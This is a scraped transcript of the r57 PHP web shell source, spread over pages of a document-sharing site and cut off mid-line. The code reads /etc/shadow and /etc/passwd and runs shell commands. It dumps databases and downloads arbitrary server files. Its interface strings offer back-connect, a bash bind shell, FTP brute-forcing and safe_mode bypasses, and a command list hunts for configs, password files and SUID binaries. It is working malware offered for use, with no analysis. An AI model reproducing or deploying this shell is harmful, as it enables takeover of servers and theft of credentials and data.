r57

download r57

of 72

Transcript of r57

  • 5/21/2018 r57

    1/72

  • 5/21/2018 r57

    2/72

    BORDER-TOP: black 1px solid;

    BORDER-LEFT: black 1px solid;

    BORDER-BOTTOM: black 1px solid;

    BORDER-COLOR: black;

    color: silver;

    }

    td {

    BORDER-RIGHT: black 1px solid;

    BORDER-TOP: black 1px solid;

    BORDER-LEFT: black 1px solid;

    BORDER-BOTTOM: black 1px solid;

    BORDER-COLOR: black;

    background-color:black;

    color: white;

    }

    .table1 {

    BORDER: 0px;

    BORDER-COLOR: #333333;

    BACKGROUND-COLOR: black;

    color: white;

    }

    .td1 {

    BORDER: 0px;

    BORDER-COLOR: #333333;

    font: 7pt Verdana;

    BACKGROUND-COLOR: black;

    color: green;

    }

    .tr1 {

  • 5/21/2018 r57

    3/72

    BORDER: 0px;

    BORDER-COLOR: #333333;

    color: #50AA20;

    }

    table {

    BORDER: #eeeeee 1px outset;

    BORDER-COLOR: #333333;

    BACKGROUND-COLOR: #131313;

    color: #50AA20;

    }

    input {

    border : solid 1px;

    border-color : #2D2D2D #252525 #252525 #252525;

    BACKGROUND-COLOR: black;

    font: 8pt Verdana;

    color: red;

    }

    select {

    BORDER-RIGHT: #ffffff 1px solid;

    BORDER-TOP: #999999 1px solid;

    BORDER-LEFT: #999999 1px solid;

    BORDER-BOTTOM: #ffffff 1px solid;

    BORDER-COLOR: #333333;

    BACKGROUND-COLOR: #131313;

    font: 8pt Verdana;

    color: white;;

    }

    submit {

    BORDER: buttonhighlight 2px outset;

    BACKGROUND-COLOR: #131313;

  • 5/21/2018 r57

    4/72

    width: 30%;

    color: white;

    }

    textarea {

    BORDER-RIGHT: #ffffff 1px solid;

    BORDER-TOP: #999999 1px solid;

    BORDER-LEFT: #999999 1px solid;

    BORDER-BOTTOM: #ffffff 1px solid;

    BORDER-COLOR: #333333;

    BACKGROUND-COLOR: black;

    font: Fixedsys bold;

    color: silver;

    }

    BODY {

    SCROLLBAR-ARROW-COLOR: #444444;

    SCROLLBAR-BASE-COLOR: #444444;

    margin: 1px;

    color: #50AA20;

    background-color: #131313;

    }

    .main {

    margin : -287px 0px 0px -490px;

    border : #000000 solid 1px;

    BORDER-COLOR: #333333;

    }

    .tt {

    background-color: black;

    }

    A:link {COLOR:red; TEXT-DECORATION: none}

    A:visited { COLOR:red; TEXT-DECORATION: none}

  • 5/21/2018 r57

    5/72

    A:active {COLOR:red; TEXT-DECORATION: none}

    A:hover {color:blue;TEXT-DECORATION: none}

    function hide_div(id){ document.getElementById(id).style.display = \'none\'; document.cookie=id+\'=0;\';

    }function show_div(id){ document.getElementById(id).style.display = \'block\'; document.cookie=id+\'=1;\';}function change_divst(id){ if (document.getElementById(id).style.display == \'none\') show_div(id); else hide_div(id);}

    ';class zipfile{var $datasec = array();var $ctrl_dir = array();var $eof_ctrl_dir = "\x50\x4b\x05\x06\x00\x00\x00\x00";var $old_offset = 0;function unix2DosTime($unixtime = 0) {$timearray = ($unixtime == 0) ?getdate() : getdate($unixtime);if ($timearray['year']

  • 5/21/2018 r57

    6/72

    $fr .= "\x08\x00";$fr .= $hexdtime;$unc_len = strlen($data);$crc = crc32($data);$zdata = gzcompress($data);$zdata = substr(substr($zdata,0,strlen($zdata) -4),2);$c_len = strlen($zdata);$fr .= pack('V',$crc);$fr .= pack('V',$c_len);$fr .= pack('V',$unc_len);$fr .= pack('v',strlen($name));

    $fr .= pack('v',0);$fr .= $name;$fr .= $zdata;$this ->datasec[] = $fr;$cdrec = "\x50\x4b\x01\x02";$cdrec .= "\x00\x00";$cdrec .= "\x14\x00";$cdrec .= "\x00\x00";$cdrec .= "\x08\x00";$cdrec .= $hexdtime;$cdrec .= pack('V',$crc);$cdrec .= pack('V',$c_len);$cdrec .= pack('V',$unc_len);

    $cdrec .= pack('v',strlen($name) );$cdrec .= pack('v',0 );$cdrec .= pack('v',0 );$cdrec .= pack('v',0 );$cdrec .= pack('v',0 );$cdrec .= pack('V',32 );$cdrec .= pack('V',$this ->old_offset );$this ->old_offset += strlen($fr);$cdrec .= $name;$this ->ctrl_dir[] = $cdrec;}function file(){

    $data = implode('',$this ->datasec);$ctrldir = implode('',$this ->ctrl_dir);return$data .$ctrldir .$this ->eof_ctrl_dir .pack('v',sizeof($this ->ctrl_dir)) .pack('v',sizeof($this ->ctrl_dir)) .pack('V',strlen($ctrldir)) .pack('V',strlen($data)) ."\x00\x00";}}

    function compress(&$filename,&$filedump,$compress){global $content_encoding;global $mime_type;if ($compress == 'bzip'&&@function_exists('bzcompress')){$filename .= '.bz2';$mime_type = 'application/x-bzip2';$filedump = bzcompress($filedump);}

  • 5/21/2018 r57

    7/72

    else if ($compress == 'gzip'&&@function_exists('gzencode')){$filename .= '.gz';$content_encoding = 'x-gzip';$mime_type = 'application/x-gzip';$filedump = gzencode($filedump);}else if ($compress == 'zip'&&@function_exists('gzcompress')){$filename .= '.zip';$mime_type = 'application/zip';

    $zipfile = new zipfile();$zipfile ->addFile($filedump,substr($filename,0,-4));$filedump = $zipfile ->file();}else{$mime_type = 'application/octet-stream';}}function moreread($temp){global $lang,$language;$str='';if(@function_exists('fopen')&&@function_exists('feof')&&@function_exists('fgets'

    )&&@function_exists('fclose')){$ffile = @fopen($temp,"r");while(!@feof($ffile)){$str .= @fgets($ffile);}fclose($ffile);}elseif(@function_exists('fopen')&&@function_exists('fread')&&@function_exists('fclose')&&@function_exists('filesize')){$ffile = @fopen($temp,"r");$str = @fread($ffile,@filesize($temp));@fclose($ffile);}elseif(@function_exists('file')){$ffiles = @file ($temp);foreach ($ffiles as $ffile) {$str .= $ffile;}}elseif(@function_exists('file_get_contents')){

    $str = @file_get_contents($temp);}elseif(@function_exists('readfile')){$str = @readfile($temp);}else{echo $lang[$language.'_text56'];}return $str;}function readzlib($filename,$temp=''){global $lang,$language;$str='';if(!$temp) {$temp=tempnam(@getcwd(),"copytemp");};if(@copy("compress.zlib://".$filename,$temp)) {$str = moreread($temp);}else echo $lang[$language.'_text119'];

    @unlink($temp);return $str;}function mailattach($to,$from,$subj,$attach){$headers = "From: $from\r\n";$headers .= "MIME-Version: 1.0\r\n";$headers .= "Content-Type: ".$attach['type'];$headers .= "; name=\"".$attach['name']."\"\r\n";$headers .= "Content-Transfer-Encoding: base64\r\n\r\n";

  • 5/21/2018 r57

    8/72

    $headers .= chunk_split(base64_encode($attach['content']))."\r\n";if(mail($to,$subj,"",$headers)) {return 1;}return 0;}class my_sql{var $host = 'localhost';var $port = '';var $user = '';var $pass = '';var $base = '';

    var $db = '';var $connection;var $res;var $error;var $rows;var $columns;var $num_rows;var $num_fields;var $dump;function connect(){switch($this->db){

    case 'MySQL':if(empty($this->port)) {$this->port = '3306';}if(!@function_exists('mysql_connect')) return 0;$this->connection = @mysql_connect($this->host.':'.$this->port,$this->user,$this->pass);if(is_resource($this->connection)) return 1;break;case 'MSSQL':if(empty($this->port)) {$this->port = '1433';}if(!@function_exists('mssql_connect')) return 0;$this->connection = @mssql_connect($this->host.','.$this->port,$this->user,$this->pass);if($this->connection) return 1;

    break;case 'PostgreSQL':if(empty($this->port)) {$this->port = '5432';}$str = "host='".$this->host."' port='".$this->port."' user='".$this->user."' password='".$this->pass."' dbname='".$this->base."'";if(!@function_exists('pg_connect')) return 0;$this->connection = @pg_connect($str);if(is_resource($this->connection)) return 1;break;case 'Oracle':if(!@function_exists('ocilogon')) return 0;$this->connection = @ocilogon($this->user,$this->pass,$this->base);if(is_resource($this->connection)) return 1;

    break;}return 0;}function select_db(){switch($this->db){case 'MySQL':if(@mysql_select_db($this->base,$this->connection)) return 1;

  • 5/21/2018 r57

    9/72

    break;case 'MSSQL':if(@mssql_select_db($this->base,$this->connection)) return 1;break;case 'PostgreSQL':return 1;break;case 'Oracle':return 1;break;}

    return 0;}function query($query){$this->res=$this->error='';switch($this->db){case 'MySQL':if(false===($this->res=@mysql_query('/*'.chr(0).'*/'.$query,$this->connection))){$this->error = @mysql_error($this->connection);return 0;

    }else if(is_resource($this->res)) {return 1;}return 2;break;case 'MSSQL':if(false===($this->res=@mssql_query($query,$this->connection))){$this->error = 'Query error';return 0;}else if(@mssql_num_rows($this->res) >0) {return 1;}return 2;break;

    case 'PostgreSQL':if(false===($this->res=@pg_query($this->connection,$query))){$this->error = @pg_last_error($this->connection);return 0;}else if(@pg_num_rows($this->res) >0) {return 1;}return 2;break;case 'Oracle':if(false===($this->res=@ociparse($this->connection,$query))){$this->error = 'Query parse error';

    }else{if(@ociexecute($this->res)){if(@ocirowcount($this->res) != 0) return 2;return 1;}$error = @ocierror();$this->error=$error['message'];

  • 5/21/2018 r57

    10/72

    }break;}return 0;}function get_result(){$this->rows=array();$this->columns=array();$this->num_rows=$this->num_fields=0;switch($this->db)

    {case 'MySQL':$this->num_rows=@mysql_num_rows($this->res);$this->num_fields=@mysql_num_fields($this->res);while(false !== ($this->rows[] = @mysql_fetch_assoc($this->res)));@mysql_free_result($this->res);if($this->num_rows){$this->columns = @array_keys($this->rows[0]);return 1;}break;case 'MSSQL':$this->num_rows=@mssql_num_rows($this->res);$this->num_fields=@mssql_num_fields($this->res);while(false !== ($this->rows[] = @mssql_fetch_assoc($this->res)));@mssql_free_result($this->res);

    if($this->num_rows){$this->columns = @array_keys($this->rows[0]);return 1;};break;case 'PostgreSQL':$this->num_rows=@pg_num_rows($this->res);$this->num_fields=@pg_num_fields($this->res);while(false !== ($this->rows[] = @pg_fetch_assoc($this->res)));@pg_free_result($this->res);if($this->num_rows){$this->columns = @array_keys($this->rows[0]);return 1;}break;case 'Oracle':$this->num_fields=@ocinumcols($this->res);while(false !== ($this->rows[] = @oci_fetch_assoc($this->res))) $this->num_rows++;

    @ocifreestatement($this->res);if($this->num_rows){$this->columns = @array_keys($this->rows[0]);return 1;}break;}return 0;}function dump($table){if(empty($table)) return 0;$this->dump=array();$this->dump[0] = '##';$this->dump[1] = '## --------------------------------------- ';$this->dump[2] = '## Created: '.date ("d/m/Y H:i:s");

    $this->dump[3] = '## Database: '.$this->base;$this->dump[4] = '## Table: '.$table;$this->dump[5] = '## --------------------------------------- ';switch($this->db){case 'MySQL':$this->dump[0] = '## MySQL dump';if($this->query('/*'.chr(0).'*/ SHOW CREATE TABLE `'.$table.'`')!=1) return 0;if(!$this->get_result()) return 0;$this->dump[] = $this->rows[0]['Create Table'];

  • 5/21/2018 r57

    11/72

    $this->dump[] = '## --------------------------------------- ';if($this->query('/*'.chr(0).'*/ SELECT * FROM `'.$table.'`')!=1) return 0;if(!$this->get_result()) return 0;for($i=0;$inum_rows;$i++){foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @mysql_real_escape_string($v);}$this->dump[] = 'INSERT INTO `'.$table.'` (`'.@implode("`, `",$this->columns).'`) VALUES (\''.@implode("', '",$this->rows[$i]).'\');';}break;

    case 'MSSQL':$this->dump[0] = '## MSSQL dump';if($this->query('SELECT * FROM '.$table)!=1) return 0;if(!$this->get_result()) return 0;for($i=0;$inum_rows;$i++){foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);}$this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ",$this->columns).') VALUES (\''.@implode("', '",$this->rows[$i]).'\');';}break;case 'PostgreSQL':$this->dump[0] = '## PostgreSQL dump';

    if($this->query('SELECT * FROM '.$table)!=1) return 0;if(!$this->get_result()) return 0;for($i=0;$inum_rows;$i++){foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);}$this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ",$this->columns).') VALUES (\''.@implode("', '",$this->rows[$i]).'\');';}break;case 'Oracle':$this->dump[0] = '## ORACLE dump';$this->dump[] = '## under construction';break;

    default:return 0;break;}return 1;}function close(){switch($this->db){case 'MySQL':@mysql_close($this->connection);break;

    case 'MSSQL':@mssql_close($this->connection);break;case 'PostgreSQL':@pg_close($this->connection);break;case 'Oracle':@oci_close($this->connection);break;}

  • 5/21/2018 r57

    12/72

    }function affected_rows(){switch($this->db){case 'MySQL':return @mysql_affected_rows($this->res);break;case 'MSSQL':return @mssql_affected_rows($this->res);break;

    case 'PostgreSQL':return @pg_affected_rows($this->res);break;case 'Oracle':return @ocirowcount($this->res);break;default:return 0;break;}}}if(!empty($_POST['cmd']) &&$_POST['cmd']=="download_file"&&!empty($_POST['d_name

    '])){if($file=@fopen($_POST['d_name'],"r")){$filedump = @fread($file,@filesize($_POST['d_name']));@fclose($file);}else if ($file=readzlib($_POST['d_name'])) {$filedump = $file;}else {err(1,$_POST['d_name']);$_POST['cmd']="";}if(isset($_POST['cmd'])){@ob_clean();$filename = @basename($_POST['d_name']);$content_encoding=$mime_type='';compress($filename,$filedump,$_POST['compress']);if (!empty($content_encoding)) {header('Content-Encoding: '.$content_encoding);}

    header("Content-type: ".$mime_type);header("Content-disposition: attachment; filename=\"".$filename."\";");echo $filedump;exit();}}if(isset($_GET['phpinfo'])) {echo @phpinfo();echo "
    [ BACK ]

";die();}if (!empty($_POST['cmd']) &&$_POST['cmd']=="db_query"){echo $head;$sql = new my_sql();

$sql->db = $_POST['db'];$sql->host = $_POST['db_server'];$sql->port = $_POST['db_port'];$sql->user = $_POST['mysql_l'];$sql->pass = $_POST['mysql_p'];$sql->base = $_POST['mysql_db'];$querys = @explode(';',$_POST['db_query']);echo '';if(!$sql->connect()) echo "Can't connect to SQL server";

5/21/2018 r57

13/72

else{if(!empty($sql->base)&&!$sql->select_db()) echo "Can't select database";else{foreach($querys as $num=>$query){if(strlen($query)>5){echo "Query#".$num." : ".htmlspecialch

ars($query,ENT_QUOTES)."
";switch($sql->query($query)){case '0':echo "Error : ".$sql->error."";break;case '1':if($sql->get_result()){echo "";foreach($sql->columns as $k=>$v) $sql->columns[$k] = htmlspecialchars($v,ENT_QUOTES);

$keys = @implode("",$sql->columns);echo "".$keys." ";for($i=0;$inum_rows;$i++){foreach($sql->rows[$i] as $k=>$v) $sql->rows[$i][$k] = htmlspecialchars($v,ENT_QUOTES);$values = @implode("",$sql->rows[$i]);echo ''.$values.'';}

echo "";}break;case '2':$ar = $sql->affected_rows()?($sql->affected_rows()):('0');echo "affected rows : ".$ar."
";break;}}}}}

echo "
";echo in('hidden','db',0,$_POST['db']);echo in('hidden','db_server',0,$_POST['db_server']);echo in('hidden','db_port',0,$_POST['db_port']);echo in('hidden','mysql_l',0,$_POST['mysql_l']);echo in('hidden','mysql_p',0,$_POST['mysql_p']);echo in('hidden','mysql_db',0,$_POST['mysql_db']);echo in('hidden','cmd',0,'db_query');echo "";echo "Base:

5/21/2018 r57

14/72

ue=\"".$sql->base."\">
";echo "".(!empty($_POST['db_query'])?($_POST['db_query']):("SHOW DATABASES;\nSELECT * FROM user;"))."


";echo "";echo "
[ BACK ]";die();}if(isset($_GET['delete'])){@unlink(__FILE__);

}if(isset($_GET['tmp'])){@unlink("/tmp/bdpl");@unlink("/tmp/back");@unlink("/tmp/bd");@unlink("/tmp/bd.c");@unlink("/tmp/dp");@unlink("/tmp/dpc");@unlink("/tmp/dpc.c");@unlink("/tmp/prxpl");@unlink("/tmp/grep.txt");}

if(isset($_GET['phpini'])){echo $head;function U_value($value){if ($value == '') return 'no value';if (@is_bool($value)) return $value ?'TRUE': 'FALSE';if ($value === null) return 'NULL';if (@is_object($value)) $value = (array) $value;if (@is_array($value)){@ob_start();print_r($value);

$value = @ob_get_contents();@ob_end_clean();}return U_wordwrap((string) $value);}function U_wordwrap($str){$str = @wordwrap(@htmlspecialchars($str),100,'',true);return @preg_replace('!(&[^;]*)([^;]*;)!','$1$2',$str);}if (@function_exists('ini_get_all')){$r = '';

echo '','DirectiveLocal ValueMaster Value';foreach (@ini_get_all() as $key=>$value){$r .= ''.ws(3).''.$key.''.U_value($value['local_value']).''.

5/21/2018 r57

15/72

U_value($value['global_value']).'';}echo $r;echo '';}echo "
[ BACK ]";die();}if(isset($_GET['cpu'])){

echo $head;echo 'CPU';$cpuf = @file("cpuinfo");if($cpuf){$c = @sizeof($cpuf);for($i=0;$i

5/21/2018 r57

16/72

{echo ''.ws(3).' --- ';}echo '';echo "
[ green ]";die();}if(isset($_GET['dmesg(8)'])){$_POST['cmd'] = 'dmesg(8)';}

if(isset($_GET['free'])){$_POST['cmd'] = 'free';}if(isset($_GET['vmstat'])){$_POST['cmd'] = 'vmstat';}if(isset($_GET['lspci'])){$_POST['cmd'] = 'lspci';}if(isset($_GET['lsdev'])){$_POST['cmd'] = 'lsdev';}if(isset($_GET['procinfo'])){$_POST['cmd']='cat /proc/cpuinfo';}if(isset($_GET['version'])){$_POST['cmd']='cat /proc/version';}if(isset($_GET['interrupts']))

{$_POST['cmd']='cat /proc/interrupts';}if(isset($_GET['realise1'])){$_POST['cmd'] = 'cat /etc/*realise';}if(isset($_GET['service'])){$_POST['cmd'] = 'service --status-all';}if(isset($_GET['ifconfig'])){$_POST['cmd'] = 'ifconfig';}if(isset($_GET['w'])){$_POST['cmd'] = 'w';}if(isset($_GET['who'])){$_POST['cmd'] = 'who';}if(isset($_GET['uptime'])){$_POST['cmd'] = 'uptime';}

if(isset($_GET['last'])){$_POST['cmd'] = 'last -n 10';}if(isset($_GET['psaux'])){$_POST['cmd'] = 'ps -aux';}if(isset($_GET['netstat'])){$_POST['cmd'] = 'netstat -a';}if(isset($_GET['lsattr'])){$_POST['cmd'] = 'lsattr -va';}if(isset($_GET['syslog'])){$_POST['cmd']='edit_file';$_POST['e_name'] = '/etc/syslog.conf';}if(isset($_GET['fstab'])){$_POST['cmd']='edit_file';$_POST['e_name'] = '/etc/fstab';}if(isset($_GET['fdisk']))

{$_POST['cmd'] = 'fdisk -l';}if(isset($_GET['df'])){$_POST['cmd'] = 'df -h';}if(isset($_GET['realise2'])){$_POST['cmd']='edit_file';$_POST['e_name'] = '/etc/issue.net';}if(isset($_GET['hosts'])){$_POST['cmd']='edit_file';$_POST['e_name'] = '/etc/hosts';}if(isset($_GET['resolv'])){$_POST['cmd']='edit_file';$_POST['e_name'] = '/etc/resolv.conf';}if(isset($_GET['systeminfo']))

5/21/2018 r57

17/72

{$_POST['cmd'] = 'systeminfo';}if(isset($_GET['shadow'])){$_POST['cmd']='edit_file';$_POST['e_name'] = '/etc/shadow';}if(isset($_GET['passwd'])){$_POST['cmd']='edit_file';$_POST['e_name'] = '/etc/passwd';}$lang=array('tr_text1'=>'Komut Uygula','tr_text2'=>'Server uzerinde komut calistir ','tr_text3'=>'Komut istemi ','tr_text4'=>'Calisma Dizini ','tr_text5'=>'Servere Dosya Upload Et',

'tr_text6'=>'Yerel Dosya ','tr_text7'=>'Dizin Veya Dosya Bul ','tr_text8'=>'Sec','tr_butt1'=>'Uygula','tr_butt2'=>'Yukle','tr_text9'=>'Porta baglan /bin/bash','tr_text10'=>'Port','tr_text11'=>'Sifre Giris','tr_butt3'=>'Baglan','tr_text12'=>'Back-Connect','tr_text13'=>'IP','tr_text14'=>'Port','tr_butt4'=>'Baglan',

'tr_text15'=>'Uzaktan servere dosya yukle','tr_text16'=>'ile','tr_text17'=>'Uzak Dosya','tr_text18'=>'Yerel Dosya','tr_text19'=>'Exploits','tr_text20'=>'Kullan','tr_text21'=>'Yeni ad','tr_text22'=>'datapipe','tr_text23'=>'Yerel Port','tr_text24'=>'Uzak Host','tr_text25'=>'Uzak Port','tr_text26'=>'Kullan','tr_butt5'=>'Iste',

'tr_text28'=>'Guvenlik Modunda Calis','tr_text29'=>'Giris Yok ','tr_butt6'=>'Degistir','tr_text30'=>'Cat file','tr_butt7'=>'Goster','tr_text31'=>'Dosya Bulunamadi','tr_text32'=>'PHP Kod Degerlendir ','tr_text33'=>'Test bypass open_basedir with cURL functions(PHP

5/21/2018 r57

18/72

'tr_text44'=>'Dosya degistirilmiyor ! YASAK ! Guvenlik Modu izin Vermiyor','tr_text45'=>'Dosya Kaydedildi','tr_text46'=>'PHP info Goster()','tr_text47'=>'Php.ini dosyasinda ki degiskenleri goster','tr_text48'=>'Temp dosylarini sil','tr_butt11'=>'Dosya Duzenle','tr_text49'=>'Server dan bu scripti sil','tr_text50'=>'CPU bilgisini incele','tr_text51'=>'Memory[hafiza] bilgisini incele]','tr_text52'=>'Metni Bul ','tr_text53'=>'Klasor Bul',

'tr_text54'=>'Dosyalarda ki Metni Bul','tr_butt12'=>'Bul','tr_text55'=>'Dosya Bul ','tr_text56'=>'Bulunmadi :( KeyCoder :)','tr_text57'=>'Olustur/Sil Dosya/Dizin ','tr_text58'=>'isim','tr_text59'=>'Dosya','tr_text60'=>'Dizin','tr_butt13'=>'Olustur/Sil','tr_text61'=>'Dosya Olustur','tr_text62'=>'Dizin Olustur','tr_text63'=>'Dosya Sil','tr_text64'=>'Dizin Sil',

'tr_text65'=>'Olustur','tr_text66'=>'Sil','tr_text67'=>'Chown/Chgrp/Chmod','tr_text68'=>'Uygula','tr_text69'=>'param1','tr_text70'=>'param2','tr_text71'=>"Second commands param is:\r\n- for CHOWN - name of new owner or UID\r\n- for CHGRP - group name or GID\r\n- for CHMOD - 0777, 0755...",'tr_text72'=>'Metin Bul','tr_text73'=>'Klasor Bul','tr_text74'=>'Dosya Bul','tr_text75'=>'* you can use regexp','tr_text76'=>'Metin Ara Dosyalarin icinde Arama Yoluyla',

'tr_text80'=>'Cesit','tr_text81'=>'Net','tr_text82'=>'Databases','tr_text83'=>'SQL Sorgusu Yap','tr_text84'=>'SQL Sorgusu','tr_text85'=>'Test bypass safe_mode with commands execute via MSSQL server','tr_text86'=>'Download files from server','tr_butt14'=>'Download','tr_text87'=>'Download files from remote ftp-server','tr_text88'=>'server:port','tr_text89'=>'File on ftp','tr_text90'=>'Transfer mode','tr_text91'=>'Archivation',

'tr_text92'=>'without arch.','tr_text93'=>'FTP','tr_text94'=>'FTP-bruteforce','tr_text95'=>'Users list','tr_text96'=>'Can\'t get users list','tr_text97'=>'checked: ','tr_text98'=>'success: ','tr_text99'=>'/etc/passwd','tr_text100'=>'Send file to remote ftp server','tr_text101'=>'Use reverse (user -> resu)',

5/21/2018 r57

19/72

'tr_text102'=>'Mail','tr_text103'=>'Send email','tr_text104'=>'Send file to email','tr_text105'=>'To','tr_text106'=>'From','tr_text107'=>'Subj','tr_butt15'=>'Send','tr_text108'=>'Mail','tr_text109'=>'Hide','tr_text110'=>'Show','tr_text111'=>'SQL-Server : Port',

'tr_text112'=>'Test bypass safe_mode with function mb_send_mail (PHP 'Error! Can\'t read file ','tr_err2'=>'Error! Can\'t create ','tr_err3'=>'Error! Can\'t connect to ftp','tr_err4'=>'Error! Can\'t login on ftp server',

5/21/2018 r57

20/72

'tr_err5'=>'Error! Can\'t change dir on ftp','tr_err6'=>'Error! Can\'t sent mail','tr_err7'=>'Mail send',);$aliases=array('----------------------------------locate'=>'','locate httpd.conf files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'locate httpd.conf>> /tmp/grep.txt;cat /tmp/grep.txt','locate vhosts.conf files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'locate vhosts.conf >> /tmp/grep.txt;cat /tmp/grep.txt','locate proftpd.conf files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'locate proftpd.

conf >> /tmp/grep.txt;cat /tmp/grep.txt','locate psybnc.conf >> /tmp/grep.txt;cat /tmp/grep.txt'=>'locate psybnc.conf >>/tmp/grep.txt;cat /tmp/grep.txt','locate my.conf files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'locate my.conf >> /tmp/grep.txt;cat /tmp/grep.txt','locate admin.php files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'locate admin.php >> /tmp/grep.txt;cat /tmp/grep.txt','locate cfg.php files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'locate cfg.php >> /tmp/grep.txt;cat /tmp/grep.txt','locate conf.php files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'locate conf.php >>/tmp/grep.txt;cat /tmp/grep.txt','locate config.dat files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'locate config.dat>> /tmp/grep.txt;cat /tmp/grep.txt',

'locate config.php files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'locate config.php>> /tmp/grep.txt;cat /tmp/grep.txt','locate config.inc files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'locate config.inc>> /tmp/grep.txt;cat /tmp/grep.txt','locate config.inc.php files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'locate config.inc.php >> /tmp/grep.txt;cat /tmp/grep.txt','locate config.default.php files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'locate config.default.php >> /tmp/grep.txt;cat /tmp/grep.txt','locate .conf files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'locate ".conf" >> /tmp/grep.txt;cat /tmp/grep.txt','locate .pwd files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'locate ".pwd" >> /tmp/grep.txt;cat /tmp/grep.txt','locate .sql files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'locate ".sql" >> /tmp/g

rep.txt;cat /tmp/grep.txt','locate .htpasswd files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'locate ".htpasswd">> /tmp/grep.txt;cat /tmp/grep.txt','locate .bash_history files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'locate ".bash_history" >> /tmp/grep.txt;cat /tmp/grep.txt','locate .mysql_history files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'locate ".mysql_history" >> /tmp/grep.txt;cat /tmp/grep.txt','locate backup files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'locate backup >> /tmp/grep.txt;cat /tmp/grep.txt','locate dump files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'locate dump >> /tmp/grep.txt;cat /tmp/grep.txt','locate priv files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'locate priv >> /tmp/grep.txt;cat /tmp/grep.txt',

'----------------------------------tar'=>'','tar -czvf all.tgz -T /tmp/grep.txt'=>'tar -czvf all.tgz -T /tmp/grep.txt','----------------------------------1'=>'','locate access_log files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'locate access_log>> /tmp/grep.txt;cat /tmp/grep.txt','locate error_log files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'locate error_log >> /tmp/grep.txt;cat /tmp/grep.txt','locate access.log files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'locate access.log>> /tmp/grep.txt;cat /tmp/grep.txt','locate error.log files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'locate error.log >

5/21/2018 r57

21/72

> /tmp/grep.txt;cat /tmp/grep.txt','locate ".log" files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'locate ".log" >> /tmp/grep.txt;cat /tmp/grep.txt','----------------------------------2'=>'','cat /var/log/httpd/access_log | grep pass >> /tmp/grep.txt;cat /tmp/grep.txt'=>'cat /var/log/httpd/access_log | grep pass >> /tmp/grep.txt','----------------------------------find'=>'','find suid files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find / -type f -perm -04000 -ls >> /tmp/grep.txt;cat /tmp/grep.txt','find suid files in current dir >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find . -type f -perm -04000 -ls >> /tmp/grep.txt;cat /tmp/grep.txt',

'find sgid files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find / -type f -perm -02000 -ls >> /tmp/grep.txt;cat /tmp/grep.txt','find sgid files in current dir >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find . -type f -perm -02000 -ls >> /tmp/grep.txt;cat /tmp/grep.txt','find all writable files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find / -type f -perm -2 -ls >> /tmp/grep.txt;cat /tmp/grep.txt','find all writable files in current dir >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find . -type f -perm -2 -ls >> /tmp/grep.txt;cat /tmp/grep.txt','find all writable directories >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find / -type d -perm -2 -ls >> /tmp/grep.txt;cat /tmp/grep.txt','find all writable directories in current dir >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find . -type d -perm -2 -ls >> /tmp/grep.txt;cat /tmp/grep.txt','find all writable directories and files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'f

ind / -perm -2 -ls >> /tmp/grep.txt;cat /tmp/grep.txt','find all writable directories and files in current dir >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find . -perm -2 -ls >> /tmp/grep.txt;cat /tmp/grep.txt','find all .htpasswd files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find / -type f -name .htpasswd >> /tmp/grep.txt;cat /tmp/grep.txt','find all .bash_history files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find / -typef -name .bash_history >> /tmp/grep.txt;cat /tmp/grep.txt','find all .mysql_history files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find / -type f -name .mysql_history >> /tmp/grep.txt;cat /tmp/grep.txt','find all .fetchmailrc files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find / -typef -name .fetchmailrc >> /tmp/grep.txt;cat /tmp/grep.txt','find httpd.conf files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find / -type f -name httpd.conf >> /tmp/grep.txt;cat /tmp/grep.txt',

